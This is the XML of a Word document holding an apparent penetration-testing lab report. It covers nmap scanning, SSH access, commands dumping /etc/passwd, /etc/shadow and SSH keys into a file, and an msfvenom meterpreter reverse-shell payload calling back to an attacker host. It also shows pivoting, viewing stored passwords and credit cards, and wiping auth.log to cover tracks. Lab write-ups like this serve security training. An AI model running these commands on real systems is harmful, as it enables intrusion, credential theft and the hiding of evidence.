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60954A" w14:textId="434BBC45" w:rsidR="005779CC" w:rsidRPr="00D661B4" w:rsidRDefault="00D661B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D661B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After creating a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D661B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D661B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance I ran the following scan commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B826CDF" w14:textId="2F0578D6" w:rsidR="00D661B4" w:rsidRPr="00D661B4" w:rsidRDefault="00D661B4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db_nmap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-A -</w:t>
      </w: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Pn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198.51.100.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF963CF" w14:textId="5C2EB287" w:rsidR="00D661B4" w:rsidRPr="00D661B4" w:rsidRDefault="00D661B4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</w:t>
      </w:r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b_nmap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</w:t>
      </w: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sV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</w:t>
      </w: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Pn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198.51.100.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683D9A3" w14:textId="25A83ABA" w:rsidR="00D661B4" w:rsidRPr="00D661B4" w:rsidRDefault="00D661B4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db_nmap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</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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198.51.100.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1B648" w14:textId="5FD341F3" w:rsidR="00D661B4" w:rsidRDefault="00D661B4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661B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got the following results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4695E9A8" w14:textId="22A99575" w:rsidR="00D661B4" w:rsidRDefault="00D661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FC84E" wp14:editId="1C707E4A">
            <wp:extent cx="5943600" cy="3929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sts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624C" w14:textId="4DD6735E" w:rsidR="00D661B4" w:rsidRDefault="00D661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taking a look at the hosts and services I notice that one machine is running windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714CB12" w14:textId="371779A0" w:rsidR="00D661B4" w:rsidRDefault="00393F91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focus on port 21, 22, &amp; 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA1C718" w14:textId="27BC4C33" w:rsidR="00393F91" w:rsidRDefault="00393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784B5B" wp14:editId="70349481">
            <wp:extent cx="5943600" cy="2120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FEF0" w14:textId="661872D8" w:rsidR="00393F91" w:rsidRDefault="00393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navigate to 192.51.100.1 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see if it is http or https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB9790" w14:textId="55DDBDEB" w:rsidR="00393F91" w:rsidRDefault="00393F9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BC719" wp14:editId="3A63C240">
            <wp:extent cx="5943600" cy="436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efo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C2E7" w14:textId="74DC8101" w:rsidR="00393F91" w:rsidRDefault="00393F9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Next I need to figure out what ssh version it is and the login (the first</w:t>
      </w:r>
      <w:r w:rsidR="00A905A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time around I did make a list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DEB83" w14:textId="58C79D47" w:rsidR="00A905A5" w:rsidRDefault="00A905A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E98641" wp14:editId="32889C01">
            <wp:extent cx="5943600" cy="3601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ss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9BB7" w14:textId="77777777" w:rsidR="00A905A5" w:rsidRDefault="00A905A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Next I ssh into the server and run an ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C3C0C" w14:textId="007C93F8" w:rsidR="00A905A5" w:rsidRDefault="00A905A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4645543B" w14:textId="77777777" w:rsidR="00A905A5" w:rsidRDefault="00A905A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA15F8E" w14:textId="51DCCA87" w:rsidR="00A905A5" w:rsidRDefault="00A905A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1FD4E8" wp14:editId="2BD4097C">
            <wp:extent cx="5943600" cy="74860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ifconfig_198,51,100,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3009" w14:textId="7EFF5963" w:rsid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I am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run the following commands to get the file below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9ADE36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-a &gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BC742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lastRenderedPageBreak/>
        <w:t>dmesg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| grep Linux &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192822BE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ef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&gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C99EED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find / -name ‘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id_dsa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’ &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2C403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find / -name ‘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id_rsa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’ &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E867FBC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find / -user root -perm -4000 -exec ls -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ldb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{} \; &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEFE33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r w:rsidRPr="00A905A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /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/passwd &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCADF7D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cat /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/shadow &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECAD01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netstat -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tulpn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&gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5DD1A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r w:rsidRPr="00A905A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /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resolv.conf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&gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEFEAEA" w14:textId="7777777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r w:rsidRPr="00A905A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A905A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>/hosts &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251527DF" w14:textId="5F0DCE0C" w:rsid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905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905A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> iptables -L &gt;&gt; meta_victim.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA69D8B" w14:textId="52B9F607" w:rsidR="00A905A5" w:rsidRPr="00A905A5" w:rsidRDefault="00A905A5" w:rsidP="00A905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03984" wp14:editId="15559434">
            <wp:extent cx="5943600" cy="2924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victim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F9C1" w14:textId="14FC53A3" w:rsidR="00393F91" w:rsidRDefault="006754BA" w:rsidP="00393F91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="11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downloading the file to my pc for further review I decide to look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2F215302" w14:textId="2C7A3AF3" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="00393F91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1130"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6834357C" w14:textId="77777777" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="00393F91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1130"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247151E7" w14:textId="69CF928B" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="00393F91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="113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2FBE06" wp14:editId="015780FE">
            <wp:extent cx="5943600" cy="303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4accou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BC6D" w14:textId="616DB429" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14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 john the riper to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dehash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passwords (I couldn’t get it to work….)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E3E36" w14:textId="00FF56C7" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1402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EECAA2" wp14:editId="1FCFC683">
            <wp:extent cx="5943600" cy="26714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joh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2D5" w14:textId="2B95F72E" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="00675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I looked at accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33387594" w14:textId="493AB61D" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754B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A8289C" wp14:editId="4C58BBEB">
            <wp:extent cx="5943600" cy="34982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account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307" w14:textId="19F11AF5" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3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I looked at credit cards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3FB33" w14:textId="6BFCBBA7" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="381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3A1523" wp14:editId="53A7135D">
            <wp:extent cx="5099312" cy="2762392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creditcard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7C36" w14:textId="479F3C9B" w:rsidR="006754BA" w:rsidRDefault="006754BA" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1087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Next I nmaped 10.10.10.0/24 -p 21,22,25,80,110,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4D343" w14:textId="088A34D0" w:rsidR="00576736" w:rsidRDefault="00576736" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1087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After that I nc 10.10.10.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918D7B8" w14:textId="0CA43B8D" w:rsidR="00576736" w:rsidRDefault="00576736" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1087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8D52C3" wp14:editId="5C475EDA">
            <wp:extent cx="5943600" cy="21361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7bann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290" w14:textId="19236613" w:rsidR="006754BA" w:rsidRDefault="008F59E5" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1087"/>
        </w:tabs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Next,</w:t>
      </w:r>
      <w:r w:rsidR="00576736">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I did 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msfvenom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-p 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linux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/x86/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meterpreter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/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reverse_tcp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LHOST=198.51.100.50 LPORT=443 -f elf --platform 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linux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-a x86 -e generic/none &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00576736" w:rsidRPr="0057673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&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBF183" w14:textId="19F78EEE" w:rsidR="00576736" w:rsidRDefault="00576736" w:rsidP="006754BA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1087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3E01D6" wp14:editId="0BA91D02">
            <wp:extent cx="5581937" cy="13335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8shel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4CC" w14:textId="06123BD2" w:rsidR="00576736" w:rsidRDefault="008F59E5" w:rsidP="00576736">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="12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shell.elf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allows a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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session to open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D997F" w14:textId="7EFC8160" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="00576736">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1292"/>
        </w:tabs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run an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap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10.10.10.0/24 to pivot to a different machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC398F" w14:textId="0516B6B0" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="00576736">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1292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B6DA5A" wp14:editId="7DDC3CD5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nma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115D" w14:textId="235AEE19" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59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using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exploit I was able to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meterpreter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session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D0D92" w14:textId="03D079B0" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59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I knew where I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was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navigated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xammp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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D17D99" w14:textId="6FD8FA8D" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59E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EE053" wp14:editId="62D51386">
            <wp:extent cx="5943600" cy="33775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2sysinf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D41A" w14:textId="70C8B39A" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59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Upon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>futher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inspection I find a passwords.txt file that I want to inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9EFCA6" w14:textId="097235D3" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59E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7CF0D0" wp14:editId="642C1017">
            <wp:extent cx="3289469" cy="5626389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accounts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6E28" w14:textId="6E19C3DF" w:rsidR="008F59E5" w:rsidRDefault="008F59E5" w:rsidP="008F59E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="244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I </w:t>
      </w:r>
      <w:r w:rsidR="00FE0BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FE0BB2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FE0BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> access log that I want to check as well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C42D0" w14:textId="3AA19FC5" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="008F59E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2441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564A0F" wp14:editId="118F1EEA">
            <wp:extent cx="5943600" cy="3357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4access,lo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9A47" w14:textId="70BB0401" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB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ping 192.168.1.1 to establish a connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51958FA0" w14:textId="638CBBAE" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB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E34B9" wp14:editId="20EA9CC3">
            <wp:extent cx="5943600" cy="404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5p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F00F" w14:textId="4061B139" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="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that I have all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data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need to cover my tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8B5AA" w14:textId="428B9DED" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="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grep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auth log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136587B" w14:textId="25FD6FF6" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="992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052A7" wp14:editId="5F3C43AF">
            <wp:extent cx="5943600" cy="34512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6auth,lo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808" w14:textId="36D4FE25" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="182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After finding it I append /dev/null &gt; auth.log to wipe out all the logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426904F" w14:textId="72D4A51B" w:rsidR="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="182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Then I run the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CEF405" w14:textId="601D544D" w:rsidR="00FE0BB2" w:rsidRPr="00FE0BB2" w:rsidRDefault="00FE0BB2" w:rsidP="00FE0BB2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1826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80961" wp14:editId="7A5B9D80">
            <wp:extent cx="5943600" cy="1640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7Dele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0BB2" w:rsidRPr="00FE0BB2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BF25DD" w14:textId="77777777" w:rsidR="00D661B4" w:rsidRDefault="00D661B4" w:rsidP="00D661B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="101923FA" w14:textId="77777777" w:rsidR="00D661B4" w:rsidRDefault="00D661B4" w:rsidP="00D66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156152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21529F" w14:textId="1C427BD6" w:rsidR="00576736" w:rsidRDefault="0057673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5A7D7D" w14:textId="77777777" w:rsidR="00576736" w:rsidRDefault="005767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BD4F86" w14:textId="77777777" w:rsidR="00D661B4" w:rsidRDefault="00D661B4" w:rsidP="00D661B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="396AA122" w14:textId="77777777" w:rsidR="00D661B4" w:rsidRDefault="00D661B4" w:rsidP="00D661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B306FC" w14:textId="55321881" w:rsidR="00D661B4" w:rsidRDefault="00D661B4">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Pen test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1B4"/>
    <w:rsid w:val="00393F91"/>
    <w:rsid w:val="00576736"/>
    <w:rsid w:val="005779CC"/>
    <w:rsid w:val="006754BA"/>
    <w:rsid w:val="008F59E5"/>
    <w:rsid w:val="00A905A5"/>
    <w:rsid w:val="00D661B4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8DB1D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4770B702-1FA8-4CA1-AF3C-26413DD0F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1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1B4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D661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1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12</Pages>
  <Words>326</Words>
  <Characters>1862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Prosser</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Justin Prosser</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-29T01:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-29T03:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>